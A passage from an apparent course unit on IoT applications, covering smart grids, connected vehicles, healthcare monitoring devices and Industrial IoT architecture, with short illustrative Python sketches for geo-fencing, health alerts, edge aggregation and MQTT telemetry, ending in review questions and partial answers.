their waste and water management solutions. IoT applications can provide real-
time data to track inventory and reduce theft and loss. Smart energy analytics
can gather data on water flow, pressure and temperature to help consumers
track usage habits. Timers and infrastructure modules can regulate usage and
reduce waste.

12.6.2.6 Energy Enablement in Developing Countries

The IEA report discusses how smart grids can provide rural areas with
electricity by transitioning to community grids that connect to regional and
national grids. These grids will be critical for deploying new power
infrastructures in developing countries experiencing population overflow
impacts. Starting with new technology ensures the best path to economic
growth.

12.6.2.7 Greater Insight into Regional Issues

Optimized smart city solutions mean greater insight into regional issues.
Imagine a smart grid set up to respond to a regional drought or wildfires in a
dry area. Adaptive city fog lighting would be suitable for some cities.
Customized technology and better data collection can improve the daily lives
of countless regional populations.

12.7 CONNECTED VEHICLES

Connected cars have become the new norm in the automobile industry, and we
can only expect it to get better and better. In the following section, let us read
on to know more about connected vehicles, connected car features and the
future of connected car technology.

12.7.1 Connected Cars

Any car which can connect to the Internet is called a Connected Car. Usually,
such vehicles connect to the internet via WLAN (Wireless Local Area
Network). A connected vehicle can also share the Internet with devices inside
and outside the car, and at the same time can also share data with any external
device/services. Connected vehicles can always access the internet to perform
functions/download data when requested by the user.

12.7.2 How does Connected Car Technology Work?

Any vehicle which is equipped with internet connectivity can be called a


connected car. Currently, automobile companies use two kinds of systems in
connected cars: Embedded and Tethered systems. An Embedded vehicle will
be equipped with a chipset and built-in antenna, and a Tethered system will be
equipped with hardware that connects to the driver’s smartphone. A connected
vehicle can access/send data, download software updates/patches, connect with
other devices (Internet Of Things or IoT) and also provide WiFi internet
connection to the passengers. The connected car telematics can also be
accessed through connected technology, and it is extremely useful for electric
vehicles.

12.7.3 Features of Connected Cars

A connected vehicle comes equipped with a host of smart and convenient features. The features of connected car technology improve the overall driving and ownership experience, and also add a safety net with advanced security features. Below are the smart features of a connected vehicle:

Internet Connectivity in Cars: A connected car is always connected to the


internet via an embedded chipset or SIM card, and it can access the internet,
provided there is stable wireless network coverage. Connected vehicles can
also provide onboard WiFi connectivity, download over-the-air updates
released by the manufacturer and access other online apps and services.

App to Car Connectivity: Nowadays, car manufacturers provide a dedicated smartphone app that connects with the vehicle through the wireless network. The app allows users to remotely operate the functions of a car such as locking/unlocking the doors, opening the sunroof, engine start/stop, climate control, headlights on/off and honking the horn. The app also helps to locate the car via the onboard GPS.

Geo-Fencing: Connected vehicles come with an important security feature known as geo-fencing. In simple words, it creates a geographical boundary on the map and alerts the owner if the vehicle is driven beyond the set boundary. The geo-fence can be set via the smartphone app, and this feature is extremely useful if you are worried about young or inexperienced drivers taking the car out (a minimal boundary-check sketch follows this list of features).

Vehicle to Vehicle Communication (V2V): Vehicle-to-vehicle connectivity technology allows connected vehicles to communicate with each other. V2V enables the sharing of vital information such as traffic movement, road conditions, speed limits and much more. V2V technology will be a critical part of autonomous vehicles, which are deemed the future of mobility.

Entertainment: A connected vehicle will allow you to connect to a host of pre-loaded entertainment services/apps. You can listen to music, internet radio or even watch videos (when the vehicle is parked). Apart from that, you can also connect your smartphone to the infotainment system of the car via apps and remotely control the audio/video.

Remote Parking: As the name of the feature suggests, some high-end connected cars even allow you to remotely park the vehicle. Using the smartphone app or the smart key fob, you can get out of your vehicle and manoeuvre the car to park it in the desired spot. This feature will come in handy in tight parking spaces and when you are not confident about parking the car in a very congested area.

Security: Connected vehicles come equipped with several critical security features such as real-time location sharing/tracking, emergency SOS calls in case of an accident, roadside assistance in case of vehicle breakdown and much more. Apart from the onboard safety equipment, these smart safety features come in handy during tricky situations.
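
The geo-fencing feature described above is essentially a repeated distance check between the car’s GPS position and a stored boundary. The following minimal Python sketch illustrates the idea for a circular fence; the centre coordinates, radius and alert action are hypothetical values chosen only for illustration, not part of any particular manufacturer’s implementation.

# Minimal geo-fence check: raise an alert when a GPS fix falls outside a
# circular boundary. Centre, radius and the alert action are assumptions.
import math

FENCE_CENTRE = (28.6139, 77.2090)   # assumed home location (lat, lon)
FENCE_RADIUS_KM = 5.0               # assumed boundary radius

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def check_geofence(vehicle_lat, vehicle_lon):
    """Return True and print an alert when the vehicle leaves the fence."""
    distance = haversine_km(FENCE_CENTRE[0], FENCE_CENTRE[1], vehicle_lat, vehicle_lon)
    if distance > FENCE_RADIUS_KM:
        print(f"ALERT: vehicle is {distance:.1f} km from home, outside the fence")
        return True
    return False

check_geofence(28.7041, 77.1025)    # sample GPS fix received from the car

A production system would run such a check on every telemetry update and push the alert to the owner’s smartphone app rather than printing it.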

12.7.4 Types of Connectivity

A connected vehicle uses different types of communication technologies, and this is where automotive and information technology work hand in hand. Below are the different types of connectivity technologies:

 Vehicle to Infrastructure (V2I): This type of connectivity is used mainly for the safety of the vehicle. The vehicle communicates with the road infrastructure, and shares/receives information such as traffic/road/weather conditions, speed limits, accidents, etc.

 Vehicle to Vehicle (V2V): The vehicle-to-vehicle communication system allows the real-time exchange of information between vehicles. V2V is also used for the safety of vehicles.

 Vehicle to Cloud (V2C): The V2C connection is established via the wireless LTE network, and it relays data to and from the cloud. Vehicle to cloud connectivity is mainly used for downloading over-the-air (OTA) vehicle updates, remote vehicle diagnostics or to connect with any IoT devices.

 Vehicle to Pedestrian (V2P): One of the newest systems used in connected vehicles is the V2P system, and it is also for safety purposes. Vehicles use sensors to detect pedestrians, which enables collision warnings.

 Vehicle to Everything (V2X): The combination of all the above-mentioned types of connectivity is known as V2X connectivity.

Connected car technology will not be limited to conventional cars. Self-driving vehicles will also make use of this technology to communicate with the road infrastructure and cloud systems. But at present, connected cars are disrupting the automobile industry. With more and more smart vehicles being launched, buyers are leaning towards connected cars. In the coming years, connected technology will be the new norm, and it will also enhance safety and reduce accidents.

Healthcare is another major domain which has significant IoT usage. Let us study Smart Healthcare in the next section.

12.8 SMART HEALTHCARE

Internet of Things (IoT)-enabled devices have made remote monitoring in the healthcare sector possible, unleashing the potential to keep patients safe and healthy, and empowering physicians to deliver superlative care. It has also increased patient engagement and satisfaction as interactions with doctors have become easier and more efficient. Furthermore, remote monitoring of patients’ health helps in reducing the length of hospital stays and prevents re-admissions. IoT also has a major impact on reducing healthcare costs significantly and improving treatment outcomes.

IoT is undoubtedly transforming the healthcare industry by redefining the space of devices and people interaction in delivering healthcare solutions. IoT has applications in healthcare that benefit patients, physicians, hospitals and insurance companies.

IoT for Patients

Devices in the form of wearables like fitness bands and other wirelessly connected devices like blood pressure and heart rate monitoring cuffs, glucometers etc. give patients access to personalized attention. These devices can be tuned to remind patients of calorie counts, exercise targets, appointments, blood pressure variations and much more.

IoT has changed people’s lives, especially elderly patients, by enabling constant tracking of health conditions. This has a major impact on people living alone and their families. On any disturbance or change in the routine activities of a person, an alert mechanism sends signals to family members and the concerned health providers.

IoT for Physicians

By using wearables and other home monitoring equipment embedded with IoT,
physicians can keep track of patients’ health more effectively. They can track
patients’ adherence to treatment plans or any need for immediate medical
attention. IoT enables healthcare professionals to be more watchful and
connect with the patients proactively. Data collected from IoT devices can help
physicians identify the best treatment process for patients and reach the
expected outcomes.

IoT for Hospitals

Apart from monitoring patients’ health, there are many other areas where IoT
devices are very useful in hospitals. IoT devices tagged with sensors are used
for tracking real time location of medical equipment like wheelchairs,
defibrillators, nebulizers, oxygen pumps and other monitoring equipment.
Deployment of medical staff at different locations can also be analyzed in real time.

The spread of infections is a major concern for patients in hospitals. IoT-enabled hygiene monitoring devices help in preventing patients from getting infected. IoT devices also help in asset management like pharmacy inventory control, and environmental monitoring, for instance, checking refrigerator temperature, and humidity and temperature control.

IoT for Health Insurance Companies

There are numerous opportunities for health insurers with IoT-connected intelligent devices. Insurance companies can leverage data captured through health monitoring devices for their underwriting and claims operations. This data will enable them to detect fraudulent claims and identify prospects for underwriting. IoT devices bring transparency between insurers and customers in the underwriting, pricing, claims handling, and risk assessment processes. With IoT-captured data driving decisions across all operational processes, customers will have adequate visibility into the reasoning behind every decision made and into process outcomes.

Insurers may offer incentives to their customers for using and sharing health
data generated by IoT devices. They can reward customers for using IoT
devices to keep track of their routine activities and adherence to treatment
plans and precautionary health measures. This will help insurers to reduce
claims significantly. IoT devices can also enable insurance companies to
validate claims through the data captured by these devices.

Advantages of Use of IoT in Healthcare

The major advantages of IoT in healthcare include:

 Cost Reduction: IoT enables patient monitoring in real time, thus significantly cutting down unnecessary visits to doctors, hospital stays and re-admissions.

 Improved Treatment: It enables physicians to make evidence-based informed decisions and brings absolute transparency.

 Faster Disease Diagnosis: Continuous patient monitoring and real-time data help in diagnosing diseases at an early stage, or even before the disease develops, based on symptoms.

 Proactive Treatment: Continuous health monitoring opens the doors for providing proactive medical treatment.

 Drugs and Equipment Management: Management of drugs and medical equipment is a major challenge in the healthcare industry. Through connected devices, these are managed and utilized efficiently with reduced costs.

 Error Reduction: Data generated through IoT devices not only helps in effective decision making but also ensures smooth healthcare operations with reduced errors, waste and system costs.

Following are some of the wearable devices and monitoring applications of IoT in healthcare:

12.8.1 Healthcare Monitoring Devices
IoT devices offer a number of new opportunities for healthcare professionals to
monitor patients, as well as for patients to monitor themselves. By extension,
the variety of wearable IoT devices provides an array of benefits and
challenges, for healthcare providers and their patients alike.

12.8.2 Remote Patient Monitoring

Remote patient monitoring is the most common application of IoT devices for
healthcare. IoT devices can automatically collect health metrics like heart rate,
blood pressure, temperature, and more from patients who are not physically
present in a healthcare facility, eliminating the need for patients to travel to the
providers, or for patients to collect it themselves.

When an IoT device collects patient data, it forwards the data to a software
application where healthcare professionals and/or patients can view it.
Algorithms may be used to analyze the data in order to recommend treatments
or generate alerts. For example, an IoT sensor that detects a patient’s unusually
low heart rate may generate an alert so that healthcare professionals can
intervene.
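
The alerting logic mentioned above can be as simple as a threshold rule evaluated on each incoming reading. The short Python sketch below illustrates this for heart rate; the limits and the notify() helper are assumptions made for the example and are not clinical recommendations.

# Illustrative threshold rule for remote heart-rate monitoring. The limits
# and the notify() helper are assumptions for the sketch, not clinical values.
LOW_BPM, HIGH_BPM = 50, 120

def notify(message):
    # Placeholder: a real system would page a clinician or push an app alert.
    print("ALERT:", message)

def evaluate_reading(patient_id, bpm):
    """Flag readings that fall outside the configured safe range."""
    if bpm < LOW_BPM:
        notify(f"Patient {patient_id}: unusually low heart rate ({bpm} bpm)")
    elif bpm > HIGH_BPM:
        notify(f"Patient {patient_id}: unusually high heart rate ({bpm} bpm)")

for reading in [72, 64, 44, 130]:      # simulated stream from a wearable
    evaluate_reading("P-001", reading)

In practice such rules are combined with trend analysis over longer windows so that gradual deterioration is also detected, not just isolated out-of-range values.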

A major challenge with remote patient monitoring devices is ensuring that the
highly personal data that these IoT devices collect is secure and private.

12.8.3 Glucose Monitoring

Glucose monitoring has traditionally been difficult. Not only is it inconvenient to have to check glucose levels and manually record results, but doing so reports a patient’s glucose levels only at the exact time the test is performed. If levels fluctuate widely, periodic testing may not be sufficient to detect a problem.

IoT devices can help address these challenges by providing continuous, automatic monitoring of glucose levels in patients. Glucose monitoring devices eliminate the need to keep records manually, and they can alert patients when glucose levels are problematic.

Challenges include designing an IoT device for glucose monitoring that:

a. Is small enough to monitor continuously without causing a disruption to patients
b. Does not consume so much electricity that it needs to be recharged frequently.

These are not insurmountable challenges, however, and devices that address
them promise to revolutionize the way patients handle glucose monitoring.

12.8.4 Heart-Rate Monitoring


Like glucose, monitoring heart rates can be challenging, even for patients who
are present in healthcare facilities. Periodic heart rate checks don’t guard
against rapid fluctuations in heart rates, and conventional devices for
continuous cardiac monitoring used in hospitals require patients to be attached
to wired machines constantly, impairing their mobility.

Today, a variety of small IoT devices are available for heart rate
monitoring, freeing patients to move around as they like while ensuring that
their hearts are monitored continuously. Guaranteeing ultra-accurate results
remains somewhat of a challenge, but most modern devices can deliver
accuracy rates of about 90 percent or better.

12.8.5 Hand Hygiene Monitoring

Traditionally, there hasn’t been a good way to ensure that providers and
patients inside a healthcare facility washed their hands properly in order to
minimize the risk of spreading contagion.

Today, many hospitals and other health care operations use IoT devices
to remind people to sanitize their hands when they enter hospital rooms. The
devices can even give instructions on how best to sanitize to mitigate a
particular risk for a particular patient.

A major shortcoming is that these devices can only remind people to clean
their hands; they can’t do it for them. Still, research suggests that these devices
can reduce infection rates by more than 60 percent in hospitals.

12.8.6 Depression and Mood Monitoring

Information about depression symptoms and patients’ general mood is another type of data that has traditionally been difficult to collect continuously. Healthcare providers might periodically ask patients how they are feeling, but they are unable to anticipate sudden mood swings. And, often, patients don’t accurately report their feelings.

“Mood-aware” IoT devices can address these challenges. By collecting and analyzing data such as heart rate and blood pressure, devices can infer information about a patient’s mental state. Advanced IoT devices for mood monitoring can even track data such as the movement of a patient’s eyes.

The key challenge here is that metrics like these can’t predict depression
symptoms or other causes for concern with complete accuracy. But neither can
a traditional in-person mental assessment.

12.8.7 Parkinson’s Disease Monitoring

In order to treat Parkinson’s patients most effectively, healthcare providers must be able to assess how the severity of their symptoms fluctuates through the day.

IoT sensors promise to make this task much easier by continuously collecting
data about Parkinson’s symptoms. At the same time, the devices give patients
the freedom to go about their lives in their own homes, instead of having to
spend extended periods in a hospital for observation.

12.8.8 Other Examples of IoT/IoMT (Internet of Medical Things)

While wearable devices like those described above remain the most commonly
used type of IoT device in healthcare, there are devices that go beyond
monitoring to actually providing treatment, or even “living” in or on the
patient. Examples include the following.

12.8.8.1 Connected Inhalers

Conditions such as asthma or COPD often involve attacks that come on suddenly, with little warning. IoT-connected inhalers can help patients by monitoring the frequency of attacks, as well as collecting data from the environment to help healthcare providers understand what triggered an attack.

In addition, connected inhalers can alert patients when they leave inhalers at
home, placing them at risk of suffering an attack without their inhaler present,
or when they use the inhaler improperly.

12.8.8.2 Ingestible Sensors

Collecting data from inside the human body is typically a messy and highly disruptive affair. With ingestible sensors, it’s possible to collect information from the digestive and other systems in a much less invasive way. They provide insights into stomach pH levels, for instance, or help pinpoint the source of internal bleeding.

These devices must be small enough to be swallowed easily. They must also be
able to dissolve or pass through the human body cleanly on their own. Several
companies are hard at work on ingestible sensors that meet these criteria.

12.8.8.3 Connected Contact Lens

Smart contact lenses provide another opportunity for collecting healthcare data
in a passive, non-intrusive way. They could also, incidentally, include
microcameras that allow wearers effectively to take pictures with their eyes, which is probably why companies like Google have patented connected
contact lenses.

Whether they’re used to improve health outcomes or for other purposes, smart
lenses promise to turn human eyes into a powerful tool for digital interactions.

12.8.8.4 Robotic Surgery

By deploying small Internet-connected robots inside the human body, surgeons can perform complex procedures that would be difficult to manage using human hands. At the same time, robotic surgeries performed by small IoT devices can reduce the size of incisions required to perform surgery, leading to a less invasive process and faster healing for patients.

These devices must be small enough and reliable enough to perform surgeries
with minimal disruption. They must also be able to interpret complex
conditions inside bodies in order to make the right decisions about how to
proceed during a surgery. But IoT robots are already being used for
surgery, showing that these challenges can be adequately addressed.

Healthcare IoT is not without challenges. IoT-enabled connected devices capture huge amounts of data, including sensitive information, giving rise to concerns about data security, so implementing apt security measures is crucial. IoT explores new dimensions of patient care through real-time health monitoring and access to patients’ health data. This data is a goldmine for healthcare stakeholders to improve patients’ health and experiences while creating revenue opportunities and improving healthcare operations. Being prepared to harness this digital power will prove to be the differentiator in the increasingly connected world.

In the next section, we will study an important concept, namely the Industrial Internet of Things (IIoT), and its applications.

12.9 INDUSTRIAL IoT (IIoT)

Industrial IoT is defined as a network of devices, machinery and sensors connected to each other and to the Internet, with the purpose of collecting data and analyzing it to apply this information to continuous process improvement. There are many Industrial IoT applications out there, and they have driven an increasing number of companies to engage in this new paradigm to improve their productivity and optimize their expenses and profits.

12.9.1 Industry 4.0 and IIoT

Industry 4.0 is the outcome of the fourth industrial revolution. The fourth industrial revolution is defined by the integration of conventional, automated manufacturing with industrial processes powered by intelligent technologies and autonomously communicating devices.

The term Industry 4.0 (also written I4.0 or simply I4) emerged in 2011 from an initiative of the German government, which over the last two decades has strongly advocated the digitization of industrial processes.

As stated by the Boston Consulting Group, IIoT is a major pillar of Industry 4.0, along with additive manufacturing or 3D printing, augmented reality (AR), autonomous robots, big data analytics, cloud computing, cyber security, horizontal and vertical system integration, and simulations. This is because autonomous communication among machines and a dispersed digital environment enables the automated resolution of problems that previously required human intervention.

Industry 4.0 covers IIoT, digitalization, and corporate sustainability in its broader scope. IIoT is the driving force behind Industry 4.0, which would not exist without it. In other words, IIoT is restricted to data detection, data transfer, data computing, data processing, and domain-specific intelligent applications.

12.9.2 IIoT Architecture

A typical industrial IoT architecture or IIoT architecture describes the arrangement of digital systems so that they together provide network and data connectivity between sensors, IoT devices, data storage, and other layers. Therefore, an IIoT architecture has the following components:

12.9.2.1 IoT-Enabled Devices (At the Edge of the Network)

These are the groupings of networked objects located at the edge of an IoT
ecosystem. These are situated as near as feasible to the data source. These are
often wireless actuators and sensors in an industrial environment. A processing
unit or small computing device and a collection of observing endpoints are
present. Edge IoT devices may range from legacy equipment in a brownfield
environment to cameras, microphones, sensors, and other meters and monitors.

What occurs at the network’s most remote edge? Sensors acquire data from
both the surrounding environment and the items they monitor. Then, they
transform the information into metrics and numbers that an IoT platform can
analyze and transform into actionable insights. Actuators control the processes
occurring in the observed environment. They modify the physical
circumstances in which data is produced.

12.9.2.2 Edge Data Management

Without high-quality, high-volume data, sophisticated analytics and artificial intelligence cannot be used to their full potential. Even on the sensor level, data processing is possible, which is necessary if you need information immediately.

In this respect, edge computing provides the quickest answers since data is preprocessed at the network’s edge, at the sensors themselves. Here, you can conduct analyses on your digitized and aggregated data. Once the relevant insights have been gathered, one can move forward to the next stage instead of sending all the collected information. This additional processing decreases the data volume sent to data centers or the cloud.
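
To make this concrete, the following Python sketch shows the kind of preprocessing an edge node might perform: a window of raw sensor samples is collapsed into a compact summary before anything is sent upstream. The sample values and the forward_to_cloud() helper are illustrative assumptions, not part of any specific platform.

# Edge-side preprocessing sketch: aggregate raw readings locally and forward
# only a compact summary record. Sample data and the upload helper are assumed.
from statistics import mean

def summarize(window):
    """Collapse a window of raw readings into one summary record."""
    return {
        "count": len(window),
        "min": min(window),
        "max": max(window),
        "mean": round(mean(window), 2),
    }

def forward_to_cloud(record):
    # Placeholder for an MQTT or HTTP upload to the IIoT platform.
    print("sending summary:", record)

raw_samples = [21.1, 21.3, 21.2, 25.8, 21.4, 21.2]   # e.g. one minute of temperature data
forward_to_cloud(summarize(raw_samples))              # six readings reduced to one record

Even this trivial aggregation cuts the transmitted volume several-fold; real deployments add filtering, compression and local anomaly detection on top.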

12.9.2.3 Use of Cloud for Advanced Processing

Edge devices are restricted in their capacity for preprocessing. While you
should strive to reach as near to the edge as is realistically possible to limit the
consumption of native computational power, users will need to utilize the
cloud for processing that is more in-depth and thorough.

At this point, you must choose whether to prioritize the agility and immediacy
of edge devices or the advanced insights of cloud computing. Cloud-based
solutions can perform extensive processing. Here, it is possible to aggregate
data from different sources and provide insights that are unavailable at the
edge.

In the context of IIoT architecture, the cloud will have:

 A Hub: It offers a secure link to the on-site system in addition to telemetry and device control. The hub provides remote connectivity to and from on-premises systems, if required, across several locations. It maintains all elements of communication, such as connection management, the secure communication channel, and device verification and authorization.
 Storage: It is useful for storing information before and after it is processed.
 Analytics: It aids in data processing and analysis.
 A User Interface: It provides visualization for conveying the analysis findings to the end user, often via a web browser interface and also through alerts via email, text message, and/or phone call.

12.9.2.4 Internet Gateways

The sensor data is gathered and turned into digital channels for further
processing at the Internet gateway. After obtaining the aggregated and
digitized data, the gateway transmits it over the internet so that it may be
further processed before being uploaded to the cloud. Gateways continue to be
part of the edge’s data-collecting systems. They remain adjacent to the
actuators and sensors and perform preliminary data processing at the edge.
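
A large part of this gateway work is simply turning raw analog readings into meaningful digital values. The sketch below shows one such conversion for a hypothetical 4-20 mA pressure transmitter read through a 12-bit ADC; the ranges are assumptions chosen for illustration.

# Gateway-style conversion sketch: scale a raw ADC count from an analog
# sensor into an engineering value before forwarding it. The 12-bit ADC and
# the 4-20 mA / 0-10 bar transmitter ranges are assumed example values.
ADC_MAX = 4095                            # 12-bit converter full scale
CURRENT_MIN, CURRENT_MAX = 4.0, 20.0      # mA current-loop range
PRESSURE_MIN, PRESSURE_MAX = 0.0, 10.0    # bar, transmitter span

def adc_to_pressure(adc_count):
    """Convert a raw ADC reading into a pressure value in bar."""
    current_ma = CURRENT_MIN + (adc_count / ADC_MAX) * (CURRENT_MAX - CURRENT_MIN)
    span_fraction = (current_ma - CURRENT_MIN) / (CURRENT_MAX - CURRENT_MIN)
    return PRESSURE_MIN + span_fraction * (PRESSURE_MAX - PRESSURE_MIN)

print(f"{adc_to_pressure(2048):.2f} bar")  # raw count 2048 maps to roughly 5 bar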

Gateways may be deployed as hardware or software:

 Hardware: Hardware gateways are autonomous devices. Wire-based (analog and digital) and wireless interfaces are provided for the downstream sensor connection. They also provide Internet connectivity, either natively or via a standard link to a router.
 Software: On PCs, software gateways may be installed instead of connecting hardware gateways. The software operates either in the background or foreground and offers the same upstream and downstream communication links as a hardware gateway, with the PC supplying the physical interfaces. Software-based gateways may enable access to visual sensor settings and sensor data presentation via user interfaces.

12.9.2.5 Connectivity Protocols

Protocols are required for the transfer of data across the IIoT system. These
protocols should preferably be industry-standard, well-defined, and secure.
Protocol specifications may contain physical properties of connections and
cabling, the procedure for establishing a communication channel, and the
format of the data sent over that channel. Some of the common protocols used
in IIoT architecture include:

 Advanced Message Queueing Protocol (AMQP): It is a connection-oriented, bidirectional, multiplexing message transport protocol with compact data encoding. AMQP, unlike HTTP, was built for IIoT-oriented cloud connectivity.
 MQ Telemetry Transport (MQTT): This is a compact, publish/subscribe client-server message transport protocol. MQTT benefits IIoT devices because of its short message frame sizes and minimal code space (see the publish sketch after this list).
 Constrained Application Protocol (CoAP): This is a datagram-oriented protocol that may be deployed over a transport layer such as the user datagram protocol (UDP). CoAP is a condensed version of HTTP developed for IIoT requirements.
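
As a small illustration of how a device or gateway might publish telemetry over MQTT, the following Python sketch uses the open-source paho-mqtt client library (installed with pip install paho-mqtt); the broker address, topic name and payload fields are assumptions made for the example.

# Minimal MQTT telemetry publish using the paho-mqtt library.
# Broker address, topic hierarchy and payload fields are illustrative assumptions.
import json
import paho.mqtt.publish as publish

reading = {"device_id": "sensor-42", "temperature_c": 71.5, "vibration_mm_s": 3.2}

publish.single(
    topic="plant1/line3/telemetry",        # hypothetical topic hierarchy
    payload=json.dumps(reading),
    qos=1,                                 # at-least-once delivery
    hostname="broker.example.com",         # assumed broker address
    port=1883,
)

On the receiving side, the IIoT platform subscribes to the same topic hierarchy and feeds the messages into its storage and analytics components.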

12.9.2.6 IIoT platforms

IIoT systems are now capable of orchestrating, monitoring, and controlling operations throughout the whole value chain. The platforms control the device data and manage the analytics, data visualization, and artificial intelligence (AI) duties from the edge devices and, in certain cases, the sensors right through to the cloud and back.

To have access to this competitive advantage, one would be wise to know the
main IIoT applications and how to implement the system.

12.9.3 Applications of IIoT

Following are some of the applications of IIoT:

12.9.3.1 Automated and Remote Equipment Management and Monitoring

One of the main IIoT applications is related to the automated management of equipment, allowing a centralized system to control and monitor all company processes.

This ability to remotely control equipment via digital machines and software
also implies that it is possible to control several plants located at different
geographic locations.
This gives companies an unprecedented ability to oversee advances in their production in real time, while also being able to analyze the historical data that they obtain in relation to their processes. The objective of collecting and using that data is to support the improvement of processes and to generate an environment where information-based decisions are a priority.

12.9.3.2 Predictive Maintenance

Predictive maintenance consists of detecting the need for a machine to be maintained before a crisis takes place and production needs to be stopped urgently. It is therefore among the reasons to implement a data acquisition, analysis and management system.

This system is one of the most effective Industrial IoT applications and works via sensors that, once installed on the machines and operating platforms, can send alerts when certain risk factors emerge. For example, the sensors that monitor robots or machines submit data to the platforms, which analyze the data received in real time and apply advanced algorithms that can issue warnings regarding high temperatures or vibrations that exceed normal parameters.
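
The core of such a rule can be quite small. The Python sketch below flags readings whose temperature or recent average vibration exceeds configured limits; the thresholds and the simulated readings are assumptions for illustration, and real predictive-maintenance systems typically replace them with learned models.

# Illustrative predictive-maintenance rule: warn when temperature or the
# recent average vibration exceeds normal parameters. Thresholds and the
# simulated readings are assumed example values.
from collections import deque

TEMP_LIMIT_C = 85.0
VIBRATION_LIMIT_MM_S = 4.5
recent_vibration = deque(maxlen=10)        # rolling window of the latest readings

def assess(temperature_c, vibration_mm_s):
    """Return a list of warnings for the latest sensor reading."""
    warnings = []
    recent_vibration.append(vibration_mm_s)
    avg_vibration = sum(recent_vibration) / len(recent_vibration)
    if temperature_c > TEMP_LIMIT_C:
        warnings.append(f"high temperature: {temperature_c} °C")
    if avg_vibration > VIBRATION_LIMIT_MM_S:
        warnings.append(f"sustained vibration: {avg_vibration:.1f} mm/s")
    return warnings

for temp, vib in [(80.1, 3.9), (86.4, 4.8), (87.0, 5.1)]:   # simulated stream
    for warning in assess(temp, vib):
        print("MAINTENANCE WARNING:", warning)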

12.9.3.3 Faster Implementation of Improvements

IIoT generates valuable information so that those in charge of improving processes in an industrial business model (process, quality or manufacturing engineers) can access data and analyze it faster and automatically, and remotely perform the necessary process adjustments. This also increases the speed at which changes and improvements are applied in Operational Intelligence and Business Intelligence – changes that are already offering competitive advantages to a myriad of industrial businesses.

12.9.3.4 Pinpoint Inventories

The use of Industrial IoT systems allows for the automated monitoring of inventory, certifying whether plans are followed and issuing an alert in case of deviations. It is yet another essential Industrial IoT application for maintaining a constant and efficient workflow.

12.9.3.5 Quality Control

Another entry among the most important IIoT applications is the ability to
monitor the quality of manufactured products at any stage: from the raw
materials that are used in the process, to the way in which they are transported
(via smart tracking applications), to the reactions of the end customer once the
product is received.

This information is vital when studying the efficiency of the company and applying the necessary changes in case failures are detected, with the purpose of optimizing the processes and promptly detecting issues in the production chain. It has also been proven to be essential for preventing risks in more delicate industries, such as pharmaceuticals or food.

12.9.3.6 Supply Chain Optimization
Among the Industrial IoT applications aimed at achieving a higher efficiency,
we can find the ability to have real time in-transit information regarding the
status of a company’s supply chain.

This allows for the detection of various hidden opportunities for improvement or pinpointing the issues that are hindering processes, making them inefficient or unprofitable.

12.9.3.7 Plant Safety Improvement

Machines that are part of IIoT can generate real-time data regarding the situation on the plant floor. Through the monitoring of equipment damage, plant air quality and the frequency of illnesses in a company, among other indicators, it is possible to avoid hazardous scenarios that pose a threat to the workers.

This not only boosts safety in the facility, but also productivity and employee motivation. In addition, economic and reputation costs that result from poor management of company safety are minimized.

12.9.4 IIoT Use Cases

Most notable industries and companies, from retail to manufacturing, use IIoT
in some way. Here are some notable IIoT examples that have resulted in
positive business outcomes:

12.9.4.1 IIoT for Asset Tracking

Embedded IIoT components in shipping, fleets, and packaging may aid in tracking inventories from start to end. They can also help maintain equilibrium between supply and demand by tracking inventory levels. PepsiCo is an example of an organization that utilizes this industrial IoT use case. It employs a vast array of technologies to adapt to market demands, manage inventory system visibility, and automatically adjust replenishment rules.

12.9.4.2 IIoT to Create Digital Twins

Digital twins are an industrial IoT application in which a sophisticated collection of sensors is utilized to construct an accurate simulation of a product or production environment, down to the last detail and physical characteristics. BMW employs IIoT, artificial intelligence (AI), and immersive technologies to construct a digital duplicate of a factory’s entire production process. This enables the organization to develop, evaluate, and optimize goods in a realistic setting without incurring related expenses or risks.

12.9.4.3 IIoT for Remote Monitoring and Cost Savings

The energy and utilities sector utilizes large operational infrastructure,
sometimes in hazardous conditions where human operators are unsuitable. In
these instances, IIoT devices may gather and transmit crucial operational data
without the presence of a human operator. For example, Larsen & Toubro
(L&T) is deploying a remotely monitored Green Hydrogen Station in Gujarat,
India. Using IIoT, L&T may reduce operational and energy expenses and gain
relevant insights into the functioning of the energy plant.

12.9.4.4 IIoT for Environmental Monitoring

The food and beverage sector relies heavily on the capacity to manufacture and
store products under ideal environmental conditions. IIoT systems may
monitor environmental changes to warn floor managers before product
degradation occurs.

The distilleries producing alcoholic beverages are an ideal example of IIoT since they operate under delicate environmental conditions. Frilli, a supplier of distillation plants, has recently deployed IIoT technologies for an Irish beverage brand to provide automation, efficiency, and uniform process flows.

12.9.4.5 IIoT Platform to Build a Smart Factory

Airbus seeks to eliminate faults by integrating industrial IoT sensors into machines and equipment on the manufacturing floor and providing employees with wearables (such as industrial smart glasses). A single error in the process might cost the organization millions of dollars to rectify. After launching its “Factory of the Future” in collaboration with Bosch, Airbus is using digital intelligence to optimize operations and increase productivity.

 Check Your Progress 1

1) What is the importance of IoT?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) Where is IoT mainly used?

…………………………………………………………………………………
…………………………………………………………………………………
3) What are the major features of IoT?
…………………………………………………………………………………
…………………………………………………………………………………
4) Explore and discuss additional applications of IoT which are not presented
in this Unit.
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
12.10 SUMMARY

In this unit we focused on various applications of IoT in Smart Cities, Smart Homes, Smart Transportation, Smart Grids, Smart Healthcare, Connected Vehicles and Industrial IoT. As this is an emerging area, explore more applications and also try to develop some applications as part of your major project. You can also think of start-ups in this area.

12.11 SOLUTIONS / ANSWERS

Check Your Progress 1

1. The Internet of Things, or IoT, is a rapidly evolving technological field that transforms any electronic device into a smarter one. Many industries are beginning to incorporate this technology into their operations in order to increase productivity and efficiency.

IoT applications aid in decision making, tracking and monitoring systems in real time, and automating daily tasks for convenience.

This cutting-edge technology offers the user several features, including cloud data storage, a platform for analyzing the collected data, real-time analytics, etc., in addition to connecting the device to the internet. This technology can be integrated into almost any industry due to its broad range of applications.

2. IoT applications are primarily used to build smart homes, smart cities, etc. IoT solutions are already in use in the following industries:

Building and Home Automation
IoT can automate lighting, cooling, security systems, and other building functions.

Automation and Optimization of Industrial Production
